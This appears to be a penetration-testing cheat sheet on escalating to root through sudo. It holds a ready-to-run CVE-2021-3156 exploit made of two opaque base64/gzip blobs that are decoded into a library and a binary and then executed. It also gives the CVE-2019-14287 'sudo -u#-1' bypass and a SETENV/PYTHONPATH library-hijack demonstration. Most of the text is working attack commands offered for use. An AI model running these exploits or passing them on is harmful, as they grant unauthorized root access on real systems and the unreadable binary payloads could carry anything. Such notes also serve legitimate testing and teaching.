🐧 SUDO

Escape CMD

CVE-2021-3156

Vulnerable if sudoedit -s '\' `perl -e 'print "A" x 65536'` return ~ β€œmalloc(): corrupted top size Aborted (core dumped)”
Pre-compiled exploit command
mkdir -p libnss_X/ &&echo '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'|base64 -d|gzip -d>libnss_X/X.so.2 &&echo 'H4sIAIynJmAAA+1bbXAbxRlenb/kfMjKt4lTIkjSJnQsm4QkNoyLZFvOGZzEDTaEQrjI1jkWyJIqnYhNy9TghkZ1Df5ROmEKQ1qmNJ3+IPyAoVOGOJiJQzplHIYUt0BrKMzINBSlLan58nX33t3z7UoC+qvD9F6P9e7z7Pvu1+2ddnX7fi/Q1iI5HIhJEfoGImjUDdhH+fjVpgnm6tBC/Hkp+goqxbjYYifqXonXTrMe8DtGeVGvQbx2WHQxKixyKa+Re96vxIJF3VDGa6ufUZ+H8oKecvDa6keakKkGnGngNRuPuMT7SdRvlvrNNvB62sFrNp7F9P8FWp6omxGv2Ri2v6OFjOtH+yPqNsRr5vdN7MeG+IsIG+49tL5C41Ip8ZoNa00k3LXtqppIqDoSjqb6q/vrtlVvu8qbjHk3G21yU9sduzoNezK/2NCS/OWUI/lPOG/5xbeXlj1b8YfOwKX3P/7b+sDdE8R2AZq/bgjdY3wuoGWcVV/q+6z+3YTmp4bY76V5+BUF+PoC/LoCfLJAvWsK2C8swN9boJwr8P/leXiEr0c3Gf5tSO0Payie0pIoqSUiahT1BSORWDfm1e47VaQo3f1BpSccDUbCdxFIPJWkFkxoSl8wHEU72lobm5TN3s3erUhp7diphNSEeiCc1NREx86mSCyqdgS7IsTzQF8sSj0VMM1rSESif8j8BHEYf/PzMbU6XE5yr6eYzUN2X8WXgM4KfC3lZR/PMzx1LehSND+HiUxbeOtzLGPhrfdV1sKXW/hZC7/AwlfS+sljTLLwHgtfZOE3WvgSC19r4cssfJ2FdyJbbLHFFltsscUWW75sIg+dd8rDJW/U4OShMU3SJ+WhF5zjZr6+9S2cpW94G39WrPXhFMG9JGtmWsey4U8EkyXuzKSBX66hu9uZMQOfIZgsOWeOG/h5gsnSd+aogRMY94yy+q58rzV99jY5/ZY89Ha2vaNtpOSHeIkrjyxeZ6gGBy5ZX/FV7POvirXNBpUmbR8puZeo+lltBe7OnBe6U65PV6wdJOWOU43tbzbst+4hatOcfHKuSE5n5ZOZa2XHKfnsnLYcF3COFuDUp3uMepj/YMMl2A+lajrloYanvaTE9DvaInm44SMv2dXiHmV68cepkgsYO/aNC/XPfAdndmIfPPCe9KycTk0fDpyXhwPT8tCYQ05PZM7M6bqcDmQnAp8Qh7+tGg58IndPYpOs7Hi+4unA+cPSUOATB6GPyPWB6YN/loc7s0YRjslTuEHY8sVxWodPTt99GtcyhtnTpPjrafEYjxF8DeAMLSODy8Bw2tqiOjCZYi1aZ7boNLYe7sTgDHafkh1nKp5GfOuyB19mbleYbmNWN9yrs4W8Mwd/Z2RZ+zZF+3bPeZ9kXPiGxeQiHJr+FLdypKQGUAbQZYCygJYBmgVUAgjNGejfiwzkBDQDyA3oNUCVgH4PyAPoBKCNgJ4EVAvoMUB1gB4E5AP0A0AyoAFA7YDuALQX0D5A+wHtBtQLyA8oDmgLoH5AGwANAloF6DCgckCjgD5eaKAjgN4DdBTQXwAdA3QW0HFA44CeAfQUoDFAvwR0GtBDgCYBDQOaAnQ3oGlAMUAZQEFAWUA3AJoFFACEdANtB+QEtAmQG1AVoEpAiwF5AOkL4PoBugCoFtBfAdUBOgfIB2gCkAzoN4DaAf0a0F5AjwDaD+gBQL2A7gEUB5QE1A9INVBgECe/BcnD5PpDchQnmyF5BCfrIXkUJ72QPIaT6yB5HCcrIfkM6T8kx3BSguRpMv/LjeQkTv4dklPPTeLb9oQff2Su+5g8Ak7hp+c5nJl51ID4ppwIZMi9/VzctPSQrJGtx4wyJjIpsJwlo1IO8wPuvicAnSZoGOfjyUGSE4emsDKe1MPU9EG4s0cMlH6JlPqTDwnTECVtuR2nT5Dvn8xRnPLf1Jp+1X9ja/qiv9Of/tSPv0E2oK8h1CmPVBN9Q9sm8lh0ZopIESc/LdKqrnytYi1qS3/Ulr7YnH7fry9/XR4ad8j1b6TeJd+Ft+zz3+rf57/Nr+BnOBpn35nct6Qttthiiy222GLLl0ccSEK3or01e1Fbk+Jva2to8nZ2tFTX+VBNKpmo6QpHa5KpUEwNhTVUnUQB452epycYjqghw7+q6Brybpi8C5p+X9ePYO3L6voY1u1Yk18Ktl7Q9SmsH8J6FuvUP3S9Eq/YRi/qeh3WWawH6Uuy5axdd+1Bjn63o2pRmXPUUeYm/Bpax9ct7c9vj9B6au/D9vuJgcvd4qq8rmLhQecgunb1NVdsWX858yfvxPuxnfV9FvG9Ff934j4YHfW73PdJTYtLJQXXAPnfJX3C+a9z+a+a+Q8Tf9znqmJLPi2f1PksGaMPdH0fIRpd7gekgKvy/qKAyzNSHHBt/FGJ7Kq9r1R21Q2V7XD5bnfV+V21ftfGRpen0VWJ7RtdTuM9ZjHuby8ux/qe0RZbbLHFFltsscUWW2z5/xV2jpGdW7SepyayiBnSg5GLKbxqFehLKGbnI6soZnum1VSzc5JrhPwP5vSYgenhQ3bWsI4egmT7olqaz840Pkz1QqorqV6BeDHPNPpAsbOP/VSzfSI7y0i7hSZLeN5dwrd7jGp29pLV/7EO/WGmcxRnaX90itn4Zil+heZ/SLH1LOb/Qti5clG20XnQQvWNVPdQfaebt2fnXnc0NV3t2disdoWDUU+dd4u3tnrbJkh8bluK8Ggdk/LxknmOneeL0Nt5+WJznvF8iTm/eL7UnIc8X2ZeL553mteZ58vN+cPzC8x5xvML5w8ic/wi5MnLL0aDeXmXGa/B8xXm/cvz7ryHvYvQEvPcP88vRaN5+WXm84Dnl5vPAZ5fkXe+FaGV5nlpnl81H0jC8ZXIl5e/BLXn5VfncBDXcUEXefIclPB4jgnj6aJ8VuAvozx7rjLZbtQx3x72HGgx0rnj00fLiQvlDBj2ueN8pED7C/Xr50beUvTKZWJOfvvjxueynHaeNMrJvY5nqL3YzjeMz9x5lTXKyb2+rznIOOTeF6UOEreAx5nOZzaeKx354xZ+avC582SzI3/8Q7ODVFmZM3/cxF7KvY+uL1COQtv5R3odX6d8TwH7QwX4h2h7xPY/XqC/T2F+iVRpPoeZPE94y/3OHltnaTsnVwLeR/k3C7TnA2qfov0KUZ78hunG83yvUO+j1J49l8zfbCWwF8d5kQT2T9HKq2hDl0gF4mEk6K9YTo2Uf3xapQJxLN0JLamlenq83Wg+7kTR+pRuElCSRIoSiikHIrGuYEQJabFEUgmm+lF3rC8eUTU15N2+ZfPW/EYk5iWsBBOJ4ICiRrXEAOpJBPtUJZTq6xvALhakYEuNM1X745FYWMOtUpSWPf6dASWwq5lEvfCmIaQ037zLv7O1ic8xgmQwtWNXpxKQaQly8x6k7Gjb3ehvU3a3tNwQ6FA6/I1tAYUF5XQnU0ajPzMMh0T6+Hxc0I4aCmpBGv3DZ3XHot1BLTfoh7eCSCGhUIUUanaED/1RQsmY0huMhkhYUOtunBEKR5VUUg1Zu0LGgwYj8WXjlioJNa4aLetKJmktRjQSiWYSW4L7z4a/YNARH+bEl4C8yYE+LdiFtZYA3ctS4SguKY680Zimev2NrdVa8ABFB6Ipb1cqHAlVh0PIQL3BZC/yhgaiuDzQWgJy7lQTyXAsygEF5yXUSJAY0lQ8opEq8biQpPdADCc0tR9/Gtfdm4gZl9Kr9tLp2RtKzCNwhSkGHiyNawj2hbsRKREqgXLw4CIvvln68KzOd/f910L2HeTZz5Z9heJGmYjvREgcnTU2SoyT9Aj24jLvSsGfrT+ZXv85/uS9z0W89mf+bJ3KNPNny0UxxmoXgr0Q82frWaadtMMs7oz5s33LjYiPjWTrXqbZfouJOH63IdjbMH+2PmZ6pdB+SdB3INgrMczW0Ux7UP72M7kLwZiaYbMlvB4T6hf7/33q30gxW5czzfaLBK7K438/ssaIopw4YnG5LV7/tODP1vlM7xfsxXDlHwv+bD/AtDheTkE/Iviz72emfyYE9YrbiscEf7YuYrpcsBf7/yvE379iPLW4PRD9nxT8C8UrF/I/IfizfQ3TsjDhxfF8EcFegG0jzfjl6vz24vifw/8VFn+2vs5+Qf83EYw98zfjw6n/tOX+t/qx60j2DQ6LP9t3TdWA3vg59b8r+Jvr91oeFvL/p+DP1re+Wr6doj+TDynH/Nn6r702v734/JqjnPhrBPMv9P1h1Xl+ckBx6j9aOl9ONcp9fpRb2s7JdlCqULjY/iUF/NV60GWCg3gm4D8QkJgQ8EEAAA=='|base64 -d|gzip -d>exploit &&chmod 755 exploit &&./exploit

CVE-2019-14287

# sudo -l => "user1 myhost = (ALL, !root) /bin/bash"
sudo -u#-1 /bin/bash

SETENV

sudo SETENV provide ability to set environment vars in sudo command
# ALL=(ALL:ALL) /bin/su
$ sudo K=1 su
sudo: sorry, you are not allowed to set the following environment variables: K

# ALL=(ALL:ALL) SETENV: /bin/su
$ sudo K=1 su
root@host:/# echo $K
1
Combined with PYTHONPATH environment variable, SETENV let you hijack python libraries,
consider the following python3 script and user exploitation:
# Legitimate script example
echo '#!/usr/bin/python3
import subprocess
subprocess.run(["whoami"])'>legit.py


# Expected Usage
$ sudo python3 legit.py
root

# Create malicious subprocess library
echo '
def run(_):
  print("EVIL")
'>/tmp/subprocess.py

# Run with fake library path
$ sudo PYTHONPATH=/tmp/ python3 legit.py
EVIL